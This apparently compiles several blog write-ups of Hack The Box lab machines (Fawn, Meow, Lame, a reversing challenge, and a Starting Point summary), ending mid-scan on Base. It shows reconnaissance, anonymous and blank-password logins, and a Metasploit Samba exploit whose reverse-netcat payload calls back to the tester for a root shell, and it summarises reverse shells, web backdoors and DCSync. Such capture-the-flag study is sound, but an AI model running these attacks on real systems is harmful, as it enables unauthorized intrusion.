Hack The Box: Machine – Fawn

Dear friend, welcome to haXez, and thank you for stopping by. Today we’re looking at the Hack The Box Machine Fawn. It’s a super easy box that requires you to enumerate the services on the box and then utilize those services to capture the flag. There are also a number of questions that you need to answer to own the machine.

Spawn Fawn

The first thing we need to do is to spawn an instance of the machine. However, a prerequisite of spawning the machine is connecting to the VPN. I’ve covered this before in my Meow walkthrough so have a look there if you don’t know where to start. Once you have connected and spawned a machine you will be given an IP address.

Ping The Thing

In order to check that we can communicate with the machine, we can use the tool ping to see if it responds to our ICMP packets. This can be run from the terminal by typing ping followed by the IP address of the box. As you can see from the output below, I sent four ping requests to the machine and it responded successfully.

┌──(kali㉿kali)-[~]
└─$ ping 10.129.247.20 
PING 10.129.247.20 (10.129.247.20) 56(84) bytes of data.
64 bytes from 10.129.247.20: icmp_seq=1 ttl=63 time=15.2 ms
64 bytes from 10.129.247.20: icmp_seq=2 ttl=63 time=14.3 ms
64 bytes from 10.129.247.20: icmp_seq=3 ttl=63 time=14.7 ms
64 bytes from 10.129.247.20: icmp_seq=4 ttl=63 time=14.9 ms
--- 10.129.247.20 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3004ms
rtt min/avg/max/mdev = 14.349/14.776/15.169/0.293 ms

A Lap With Nmap

Now that we know we can communicate with the Fawn machine, we need to enumerate what services the machine is running. We can do this using our favorite network mapping tool Nmap. It is good practice to throw some additional flags or arguments onto your Nmap scan in order to get as much information from the scan as possible. For this reason, we are going to tell Nmap to report back the service and operating system versions. The output below shows that the machine is running vsftpd version 3.0.3 and that the base operating system is Unix.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -p0- 10.129.247.20
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 12:36 EDT
Nmap scan report for 10.129.247.20
Host is up (0.017s latency).
Not shown: 65535 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=5/8%OT=21%CT=1%CU=37672%PV=Y%DS=2%DC=I%G=Y%TM=6277F198
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=103%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST11
OS:NW7%O6=M505ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%R
OS:UCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Unix
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.38 seconds

FTP Anonymity

FTP or File Transfer Protocol is a service that allows you to transfer files between a client and server. There are many clients out there including terminal and graphical based ones. One FTP misconfiguration that can be taken advantage of is the anonymous login feature. Anonymous login is just that, it allows you to log in anonymously. You don’t need to know the username or password of an existing user. You just have to specify your name as Anonymous and submit anything for a password. If Anonymous logins are supported then you will be granted access to the files on the FTP server. As you can see below, Anonymous logins are supported by the server and we can log in and view the files using the dir command.

┌──(kali㉿kali)-[~]
└─$ ftp 10.129.60.207                                                           
Connected to 10.129.60.207.
220 (vsFTPd 3.0.3)
Name (10.129.60.207:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||43096|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
226 Directory send OK.

Grab The Flag

The Fawn FTP server appears to have a text file on it called flag.txt Perhaps this is the elusive root flag that we need to capture. In order to download the flag we can use the get command. The get command allows you to download files from the server and you can see an example of me using it to download the flag below.

ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||31037|)
150 Opening BINARY mode data connection for flag.txt (32 bytes).
100% |*****************************************************************    32       21.00 KiB/s    00:00 ETA
226 Transfer complete.
32 bytes received in 00:00 (0.60 KiB/s)

Once the flag has been downloaded, you can use the cat command to view the contents of the file.

┌──(kali㉿kali)-[~]
└─$ cat flag.txt   
035db21c881520061c53e0536e44f815 

Fawn Questions And Answers

Before we can submit the root flag, there are a number of questions that we need to answer. I will run through these questions now.

Firstly, What does the 3-letter acronym FTP stand for? File Transfer Protocol

Fawn - What does the 3-letter acronym FTP stand for?
What does the 3-letter acronym FTP stand for?

What communication model does FTP use, architecturally speaking? Client-Server Model

What communication model does FTP use, architecturally speaking?
What communication model does FTP use, architecturally speaking?

What is the name of one popular GUI FTP program? Filezilla

Fawn - what is the name of one popular GUI FTP program?
What is the name of one popular GUI FTP program?

Which port is the FTP service active on usually? 21 TCP

Fawn - Which port is the FTP service active on usually?
Which port is the FTP service active on usually?

What acronym is used for the secure version of FTP? SFTP

Fawn - What acronym is used for the secure version of FTP?
What acronym is used for the secure version of FTP?

What is the command we can use to test our connection to the target? Ping

What is the command we can use to test our connection to the target?
What is the command we can use to test our connection to the target?

From your scans, what version is FTP running on the target? vsftpd 3.0.3

From your scans, what version is FTP running on the target?
From your scans, what version is FTP running on the target?

From your scans, what OS type is running on the target? Unix

From your scans, what OS type is running on the target?
From your scans, what OS type is running on the target?

Submit root flag

Hack The Box: Machine – Meow

Dear Friend, welcome to HaXeZ where today we’re looking at one of the Hack The Box Machines called Meow. This machine is part of the Tier 0 starting point boxes and is regarded as a very easy box. Additionaly, there are a number of questions that you need to answer in order to complete this machine. First we need to connect to the VPN. In order to do that click on the Starting Point link and download the OpenVPN files.

Download VPN
Download VPN

Connect To The Hack The Box VPN

Once you have the files downloaded, put them in your Virtual Machines shared folder. If you don’t know where that is then please see my guide on creating a virtual machine shared folder. Once the file is in your shared folder, boot your Virtual Machine and log in. Next you need to either navigate to the mount point of your shared folder or put the full file path in the following command.

┌──(kali㉿kali)-[/media/sf_OneDrive/Hack The Box/VPN]
└─$ ls
starting_point_HaXeZ.ovpn                                                                                                                                                                                    
┌──(kali㉿kali)-[/media/sf_OneDrive/Hack The Box/VPN]
└─$ sudo openvpn starting_point_HaXeZ.ovpn
2022-04-29 08:28:32 WARNING: Compression for receiving enabled. Compression has been used in the past to break encryption. Sent packets are not compressed unless "allow-compression yes" is also set.
---SNIP---
2022-04-29 08:41:55 Initialization Sequence Completed

You should have now successfully complete the first challenge.

Connect To VPN
Connect To VPN

Spawn The Machine

Further down the page you should see question two with an option to spawn the box. Click on the spawn the box link and it should do just that. Additionally, once the box has been spawn you should see an IP address. Essentially, this is the address for the box that we will use to communicate with it.

Spawn Machine
Spawn Machine

You can now probably answer the next few questions too. The next one should be what does the acronym VM stand for? The answer is Virtual Machine.

Virtual Machine Acronym
VM Acronym

The next question is what tool do we use to interact with the operating system in order to start our VPN connection? That will be the terminal.

VPN Service
VPN Service

After that, it asks What is the abbreviated name for a tunnel interface in the output of your VPN boot-up sequence output? You can find this out by running ifconfig on your virtual machine. If snipped out my eth0 and loop back address and some other information but you can see that the abbreviated name is tun.

┌──(kali㉿kali)-[/media/sf_OneDrive/Hack The Box/Machines/Meow]
└─$ ifconfig
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1500
inet 10.10.15.119  netmask 255.255.254.0  destination 10.10.15.119
tun machine Interface
tun Interface

Ping The Machine

Now that the box has been spawn and you know its address, it’s time to see whether we can talk to it. In order to do that we’re going to use the ‘ping’ command.

┌──(kali㉿kali)-[/media/sf_OneDrive/Hack The Box/Machines/Meow]
└─$ sudo ping 10.129.122.207 | tee -a ping.txt
PING 10.129.122.207 (10.129.122.207) 56(84) bytes of data.
64 bytes from 10.129.122.207: icmp_seq=1 ttl=63 time=15.6 ms

Which should now allow you to answer the next question which is what tool do we use to test our connection to the target? The answer is ping.

Ping Machine
Ping Machine

NMAP The Machine

Next we need to find out what services are available for us to talk to on the box. In order to do that we will use NMAP.

┌──(kali㉿kali)-[/media/sf_OneDrive/Hack The Box/Machines/Meow]
└─$ sudo nmap -sC -sV -p- 10.129.122.207 | tee -a nmap.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-29 08:42 EDT
Nmap scan report for 10.129.122.207
Host is up (0.036s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
23/tcp open  telnet  Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Furthermore, you should now be able to answer the next question which is what is the name of the tool we use to scan the targets ports? The answer is nmap.

nmap the machine
nmap tool

Telnet To The Box

The results from the nmap scan showed us that port 23 or telnet is open on the box. There were no other services listening so we should attempt to connect to telnet to see what’s running. In order to do this we need to type the telnet command followed by the ip address and then the port. Include spaces between each entity.

┌──(kali㉿kali)-[/media/sf_OneDrive/Hack The Box/Machines/Meow]
└─$ sudo telnet 10.129.122.207 23
Trying 10.129.122.207...
Connected to 10.129.122.207.
Escape character is '^]'.

  █  █         ▐▌     ▄█▄ █          ▄▄▄▄
  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀    █  █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀
  █  █ █▄█ █▄▄ ▐█▀▄    █  █ █ █▄▄    █▌▄█ ▀▄▄▀ █▀█

Meow login: Administrator
Password: 
Login incorrect

After a bit of time waiting, we are greeted with an ascii hack the box logo. This should allow you to answer the next question which is what service do we identify on port 23/tcp during our scans? The answer is telnet.

Telnet
Telnet

Login To The Box

We now need to login to the box but we don’t have any credentials. However telnet is predominantly a windows service so we can try logging in with Administrator or admin but those don’t work. However, if we try logging in as root with a blank password then we are successfully authenticated.

┌──(kali㉿kali)-[/media/sf_OneDrive/Hack The Box/Machines/Meow]
└─$ sudo telnet 10.129.122.207 23
Trying 10.129.122.207...
Connected to 10.129.122.207.
Escape character is '^]'.

  █  █         ▐▌     ▄█▄ █          ▄▄▄▄
  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀    █  █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀
  █  █ █▄█ █▄▄ ▐█▀▄    █  █ █ █▄▄    █▌▄█ ▀▄▄▀ █▀█

Meow login: Administrator
Password: 
Login incorrect
Meow login: root
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

After logging in we can see that the box is in fact Linux and running the Ubuntu operating system. We should now be able to answer the next question which is what username ultimately works with the remote management login prompt for the target. The answer is root.

root user
root user

Capture The Flag

Finally we now need to capture the flag. Fortunately they haven’t hidden it from us and we list out the directory we are currently in and see the file. Then all we need to do is cat that file and submit the flag to the web page.

Last login: Mon Sep  6 15:15:23 UTC 2021 from 10.10.14.18 on pts/0
[email protected]:~# ls
flag.txt  snap
[email protected]:~# cat flag.txt
b40abdfe23665f766f9c61ecba8a4c19
[email protected]:~#
Capture the flag

And that’s it, you should now have pwned meow and can move on to the next box. Congratulations.

Meow has been pwnd

Find The Easy Pass has been Pwned!

Today we are continuing the Hack The Box Beginner Track with the Reversing Challenge Find The Easy Pass. Full disclaimer, I have little to almost no reverse engineering experience. I have looked at this challenge before and completed it but I didn’t understand what was going on. I did some assembly back in college but that was over a decade a go now and I’ve forgotten all of it.

So with that out the way, let’s get reversing.

First you need to head over to Hack The Box and download the files for this challenge.

Reversing find the easy pass download
find the easy pass download

That should download the file to your downloads directory or wherever you have it set. You need to extract the contents of the zip archive but it is password protected. The password is listed on the challenge and it is ‘hackthebox’. If you’re on Windows you should be able to double click the executable and run it right away. However, if you’re on Linux then you need to run it with emulation software like wine.

Reversing Find The Easy Pass running the exe
running the exe

Now that the application is running it’s a good to make note of the strings you see displayed in the application. This can help track down locations in the program when it’s time to decompile it. The next thing to check is what happens when we submit data to the application.

Find The Easy Pass wrong password
wrong password

Well we have failed, we have submitted the wrong password and the application is mocking us. So where do we go from here? Well we need a program that rips other programs to bits so we can see their insides. Take a look at my article on Ghidra if you haven’t already got it set up and installed. Let’s get reversing. With the .exe loaded in Ghidra it’s time to search for those strings we made note of earlier. The top menu has a search option. Click it, then click search for strings.

Reversing search for strings
search for strings

A new window should pop up with some options to refine the search. I kept the options as default and clicked search.

Reversing Ghidra search refine
refine search

Once that is done, another window will pop up showing all the strings that Ghidra found in the code. There is a filter option at the bottom which you can use to refine the search even further. As we know from testing the application, the string ‘password’ was seen on the application. Let’s look for it.

Ghidra search filter
search filter

Ok, we’re making slow but steady progress and that’s what we need to do in order to beat the rabbit right, or was it the hare? I hope all reversing doesn’t take this long. Next we need to double click on the row containing “Wrong Password” and that will take us to the location of that code section in the application.

wrong password code location
00545200 reference wrong password code location

The section of code has been highlighted in blue. You can see that are currently looking at memory reference 00545200. If we right click the highlighted section and click on references, then show references to address, a new window will pop up showing the memory address.

Reversing finding wrong password address reference
finding wrong password address reference
wrong password address reference
wrong password address reference

You can see that the location is 00454144. If we double click that address again then it will take us back to the main window and the location of the next memory reference.

reversing find the easy pass memory refrence
00454144 memory reference

Lost? yeah don’t worry it has taken me several attempts to get this far with reversing and I’m not ashamed to admit that I’ve read a number of walkthroughs. Now if you look at the top bar, there is a “hierarchical order” icon (only thing I could think to call it) next to the green play button. Click it to launch the function graph window. You should end up with a window looking like something below.

function graph window
function graph window

Now if you zoom in to the final 4 boxes you can see there is a bit of logic going on. The program has two different sections of code depending on the results. Essentially, this is an IF statement. If one condition is met then run the code in the first box (00454138), if not then run the code in the second box (00454144).

Reversing if statement
IF statement

If we look in the box directly above the two, you can see the function (FUN_00404628) that determines which box is going to run next. If we click on the function number it should take us to where the function is being called. Make a note of the memory reference 00454131.

Function CALL
Function Call

Then if you double click the function, it should take you to the IF statement in the main window where we can see what it’s doing. As you can see below, the application is taking the values from param_1 and param_2 and stores them in EAX and EDX. Then further down you should see that the values of param_1 and param_2 are are written to the stack using PUSH and compared using CMP. We can assume that since this is checking whether that the password is correct that one of these parameters contains the correct password.

reversing comparing parameters
comparing parameters

So next we need to debug the program and check out what’s inside these parameters. To do this I am going to use ollydbg. If you need to install ollydbg you can do so from the CLI using ‘sudo apt-get install ollydbg’. Once the program is installed you can launch it by running ‘ollydbg’. Once ollydbg is running, click file, open and select EasyPass.exe.

reversing using olydbg
olydbg

With the program loaded in we need to find our memory reference. There is probably a way to search for memory references but I just scrolled through until I found it. Right click the reference and select breakpoint and click toggle.

toggle breakpoint
toggle breakpoint

Now if you click the play button to run the program, it will launch and ask you for the password. However, this time instead of checking whether the password is correct, it will halt, and you will be able to see the value that it is comparing it against. The image below shows our input of “test” and another value “fortran!”.

run program with breakpoint

Now if we run the program again using wine, we can input the password to check to see whether it is correct, and it is. Congratulations you have completed the easiest reversing challenge there is. There are probably much easier ways to do this without using Ghidra but I wanted to check it out.

correct password
correct password
Find the easy pass has been pwned!
Find the easy pass has been pwned!

Check out some of my other posts including ArchetypeOopsie, VaccineShieldPathfinderIncluded and Markup.

Lame has been Pwned!

I’m back once again doing Hack The Box machines. I have recently hacked all the Starting Point machines and am now moving on to the Beginner track. I’ve written a post on my experience with the Starting Point machine which you can read here

Reconnaissance

The name of the machine I’m going to be looking at today and the first machine in the Beginner Track is Lame. As always, we start by checking to see whether the box is online and responding to pings.

[10.10.14.84]─[[email protected]]─[/media/sf_OneDrive/Hack The Box/Machines/Lame/Output]
└──╼ [★]$ sudo ping 10.129.81.166 | tee -a ping ping.lame.txt
[sudo] password for joe:
PING 10.129.81.166 (10.129.81.166) 56(84) bytes of data.
64 bytes from 10.129.81.166: icmp_seq=1 ttl=63 time=21.4 ms
64 bytes from 10.129.81.166: icmp_seq=2 ttl=63 time=20.4 ms

As you can see, the box is responding which means it’s safe to go ahead and run an nmap scan. I tell nmap to run safe checks, version checks and operating system identification on all ports. You can see the specific command and the output below.

[10.10.14.84]─[[email protected]]─[/media/sf_OneDrive/Hack The Box/Machines/Lame/Output]
└──╼ [★]$ sudo nmap -sC -sV -O -p0- 10.129.81.166 | tee -a nmap.lame.txt
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.84
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2021-09-15T14:40:20-04:00
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 40068/tcp): CLEAN (Timeout)
|   Check 2 (port 45806/tcp): CLEAN (Timeout)
|   Check 3 (port 54683/udp): CLEAN (Timeout)
|   Check 4 (port 34973/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 1h59m26s, deviation: 2h49m56s, median: -43s
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-security-mode: Couldn't establish a SMBv2 connection.

I’ve snipped out a bunch of the stuff we don’t need to see and have highlighted the areas which I think are of interest. Going down the lists of results I see that port 21 (FTP) is open and is allowing anonymous logins. The first thing I did was to login and check to see whether there were any files on there.

[10.10.14.84]─[[email protected]]─[/media/sf_OneDrive/Hack The Box/Machines/Lame/Output]
└──╼ [★]$ sudo ftp 10.129.81.166
Connected to 10.129.81.166.
220 (vsFTPd 2.3.4)
Name (10.129.81.166:joe): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> 

As you can see, there wasn’t anything interesting. I know that VSFTPD 2.3.4 has CVE-2011-2523 associated with it which is a backdoor. The backdoor requires the user to login with a smiley face and it grants them access. I attempted to do this but had no luck. I used the Metasploit module but that didn’t work so I it’s safe to say it’s patched. Moving on.

Foothold Hack

So from here we move on to the next port in the list, 138 and 445 (Samba). I can see that version of Samba is 3.0.20 let’s check SearchSploit to see whether there are any known vulnerabilities for this particular version.

[10.10.14.84]─[[email protected]]─[/media/sf_OneDrive/Hack The Box/Machines/Lame/Output]
└──╼ [★]$ sudo searchsploit Samba 3.0.20
------------------------------------------
 Exploit Title                                                                                                                                              |  Path
------------------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass                                                                                                      | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)                                                                            | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow                                                                                                                       | linux/remote/7701.txt
Samba < 3.0.20 - Remote Heap Overflow                                                                                                                       | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                                                                                               | linux_x86/dos/36741.py
------------------------------------------

As you can see from the snippet of code above, it looks like there is a command execution vulnerability and that there is a Metasploit module for. Let’s launch Metasploit (using msfconsole) and see if we can find and use the module.

msf6 > search samba 3.0.20
Matching Modules
================
   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution

Ok we have found the exploit, we can select it by running ‘use 0’. Once we have the module loaded we can run ‘options’ to see what we need to populate the options with.

sf6 exploit(multi/samba/usermap_script) > options
Module options (exploit/multi/samba/usermap_script):
   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS  10.129.81.166    yes       The target host(s), range CIDR identifier, 
   RPORT   139              yes       The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.84      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
Exploit target:

   Id  Name
   --  ----
   0   Automatic

It looks like we only have to set the RHOSTS option. The RHOSTS option is the setting you use to declare the IP address of the remote host. The RPORT is the remote port, as you can see it is targeting port 139. The LHOST and LPORT options are our localhost IP and port that we want the machine to connect back to. With all that configured, let’s run the ‘exploit’ command and see if it creates a session.

 msf6 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP handler on 10.10.14.84:4444 
[*] Command shell session 1 opened (10.10.14.84:4444 -> 10.129.81.166:34291) at 2021-09-15 20:06:43 +0100
whoami
root

Hallelujah, praise the hack gods. Metasploit successfully created a session on the remote machine and not only that but it looks like we are root too. That means no privilege escalation is required on this machine. Let’s grab the root flag.

cat /root/root.txt
f40--------haXez--------712

We still have to submit the user flag so we need to go hunting for it. Let’s check home directory and see if there are any users and whether any of them is hiding the user flag.

ls /home
ftp
makis
service
user
ls /home/makis
user.txt
cat /home/makis/user.txt
8af--------haXez--------3fb
Hack The Box Lame has been Pwned!
Lame has been Pwned!

Starting Point has been Pwned!

Starting Point on Hack The Box is a collection of “Very Easy” machines designed to give an introduction to the hacking world. This is the red pill that will have you feeling like Alice tumbling down the rabbit hole. Unfortunately, there are multiple rabbit holes and not all of them lead to Wonderland. Alice may have met the Cheshire Cat, but you will encounter many different types of Cat that will assist you on your journey. As Morpheus once said:

“You take the blue pill, the story ends. You wake up in your bed and believe whatever you want to. You take the red pill, you stay in Wonderland, and I show you how deep the rabbit hole goes. Remember, all I’m offering is the truth. Nothing more.”

Morpheus

Let’s begin! My name is Zero Cool (kidding! it’s Joe) and I’ve been working in Cyber for around 2 years (at the time of writing). I’ve worked in tech for almost 10 years doing various jobs but have always been drawn to hacking. These machines continuously taught me new techniques. I have write-ups of each box if you want to check them out but here I will mostly be summarising my experience with the machines.

Archetype

This is a machine that requires you to perform SMB enumeration to get credentials for a MSSQL database. The SMB enumeration was straight forward but I’ve never used the Impacket database connection tool before. I wouldn’t have even known about it if it wasn’t for this box. Once authenticated, I needed to use xp_cmdshell to execute a PowerShell command to download a reverse shell PowerShell script. After the reverse shell had connected back to my machine, further enumeration was required to grab the Administrator password from the history. This machine was a lot of a fun and I learnt about some new tools.

Starting Point Oopsie

This machine required me to leverage broken access control restrictions to impersonate another higher privilege user. This one done using the tool Burp Suite. I’m quite familiar with Burp Suite but have never encountered a situation quite like this before. I’ve brute force parameters before to get API’s to dump information that they should but this was fairly unique. Once I was able to impersonate super admin it was possible to upload a reverse shell and have the machine connect back to me. Escalating privileges to root required manipulating a script that wasn’t calling a tool by the full path. This was something I had done before but am not overly confident doing. I enjoyed this box as understanding the vulnerabilities was straight forward. 

Starting Point Vaccine

This was the next target to succumb to my amateur hacking skills. This machine required downloading a password protected ZIP archive from FTP and then using tools to generate and crack the password hash of the ZIP. The ZIP contained a PHP index file which had some hardcoded MD5 encrypted credentials. The MD5 was cracked and then it was possible to login to the website. The next step was to perform an SQL injection attack while passing it my session cookie. The SQL injection was used to get a shell on to the machine which was then upgraded using bash. I then grabbed the postgres password and switched to that user. Postgres had the sudo ability to edit a particular file with vi which I exploited to escape to root. 

Starting Point Shield

This was the next victim on the list and gave me more trouble than I expected. This machine required exploiting WordPress by adding a backdoor to one of the themes PHP files. Once the backdoor was embedded it was possible to command it to download and execute reverse shell. Once on the machine I discovered that I had to use JuicyPotato to execute nc.exe to spawn a privileged reverse shell. I had not used JuicyPotato before and had a bit of trouble choosing which process to attach it to. I’m not entirely certain how it works yet so I need to do more research on it. This box was a lot of fun though and taught me about JuicyPotato. 

Starting Point Pathfinder

This machine was next on my hit list and was my first encounter with a Domain Controller on during the Starting Point series. I’ve pen tested domain controllers before, so I sort of knew what to look out for. There were several ports that I targeted right away but the service I needed to poke was LDAP. Using the tool ldapdomaindump and authenticating as Sandra it was possible to dump user information. Then using another tool from Impacket it was possible to trick the server in to giving me a user hash which I cracked offline. With the hash cracked it was possible to perform a DCSync attack and grab the Administrator hash which gave us full access. This was a great box which I feel simulates possible configuration weaknesses that you might find in the real world.

Starting Point Included

This machine was next to get isolated and hacked by my 1337 haxor skills. Seriously though this was another fun box that leveraged directory traversal or local file inclusion. It was an obvious foothold initially due to the naming convention of the parameter used to call the index file. The machine had TFTP running so it was possible to put a reverse shell on it. By leveraging the local file inclusion attack to determine the path of the TFTP directory it was possible to call the reverse shell. 

Starting Point Markup

This was a fun machine that taught me about XML entity injection. I need to brush up on this subject so I’m going to check out the Portswigger web academy labs on it. The XXE attack allowed me to retrieve a user’s private key which I could then use to SSH to the box. After running winPEAS I found a file that the user had access to that was running as a scheduled task. Furthermore, we could echo content into this file so we dropped a netcat executable on the machine. I then echoed a command into the file so that it would create a reverse shell back to our machine the next time it ran. Great box but ran in to a few issues with it. Check out the post for more details.

Starting Point Guard

This was a relatively simple machine with a neat trick for privilege escalation. This machine used credentials from the previous machine to gain SSH access. Once on the box I needed to use the built-in shell in man pages to escape the restricted shell and cat the user flag. The shell was still restricted as I was unable to use wget or curl to download any files. I used SSH to pipe LinPEAS on to the machine. LinPEAS found that root logins were permitted with passwords and that my use could access the shadow file with the root hash inside it. Cracking the file offline allowed me to SSH to the machine as root and capture the root flag. 

Starting Point Base

This was the last machine in the Starting Point category on Hack The Box and it was a lot of fun to complete. I will admit that the web application on the machine ran horrendously slow which become tiresome at times. Base required me to snoop through listed directories and grab a PHP file containing the source code of the login page. The source code revealed it was configured in a vulnerable way that would allow me to bypass the authentication page. By intercepting and manipulating the login request it was possible to access an upload page. After uploading a reverse shell and gaining access to the box I needed to search through the web files and move laterally to the John user. After that it was a GTFOBin on the find command that elevated me to root and allowed me to capture the final flag. 

Starting point has been Pwned!
Starting point has been Pwned!

Conclusion

This was a fun learning experience that made me think about the solutions. I spent a lot of time researching each of the findings and have a huge list of things I still have to look in to. I would like to revisit each of the machines once I have levelled up my skillset to see if there are any other ways that they could be completed. I’m drawn to Cyber Security and hacking like a moth to a flame so this was a really fun challenge for me. If you have an interest in tech or are already working in tech and want to improve your skillset then I highly recommend giving this a go.

Base has been Pwned!

This is the final machine of the Starting Point category on Hack The Box. I’ve been looking forward to doing this machine since I completed the last one. In traditional techy fashion however, I‘ve just spent most of the evening trying to work out why my Virtual Machine kept crashing. For some reason it kept producing invalid memory address registers. After an update, a reboot, and some tinkering, it now appears to be fine. That has nothing to do with this though so let’s jump right in.

Reconnaissance

Ok so first, after spawning the machine we ping it to check that it’s online.

[10.10.14.57]─[[email protected]]─[/media/sf_E_DRIVE/OneDrive/Hack The Box/Machines/Base/Output]
└──╼ [★]$ sudo ping 10.10.10.48 | tee -a ping.10.10.10.48.txt
PING 10.10.10.48 (10.10.10.48) 56(84) bytes of data.
64 bytes from 10.10.10.48: icmp_seq=1 ttl=63 time=21.6 ms
64 bytes from 10.10.10.48: icmp_seq=2 ttl=63 time=20.5 ms

The machine is talking to us! we have it right where we want it! Time to hack it with nmap.

[10.10.14.57]─[[email protected]]─[/media/sf_E_DRIVE/OneDrive/Hack The Box/Machines/Base/Output]
└──╼ [★]$ sudo nmap -sC -sV -O -p0- 10.10.10.48 | tee -a nmap.10.10.10.48.txx
Starting Nmap 7.91 ( https://nmap.org ) at 2021–09–14 17:41 BST
Nmap scan report for 10.10.10.48
Not shown: 65534 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f6:5c:9b:38:ec:a7:5c:79:1c:1f:18:1c:52:46:f7:0b (RSA)
|_ 256 b8:65:cd:3f:34:d8:02:6a:e3:18:23:3e:77:dd:87:40 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

It looks like we have a webserver running on Ubuntu. Before I look at the site, I will launch a dirb scan to check for any interesting directories that we can hack.

[10.10.14.57]─[[email protected]]─[/media/sf_OneDrive/Hack The Box/Machines/Base/Scripts]
└──╼ [★]$ sudo dirb http://10.10.10.48 /usr/share/dirb/wordlists/big.txt -w
— — — — — — — -
DIRB v2.22 
By The Dark Raver
— — — — — — — — -
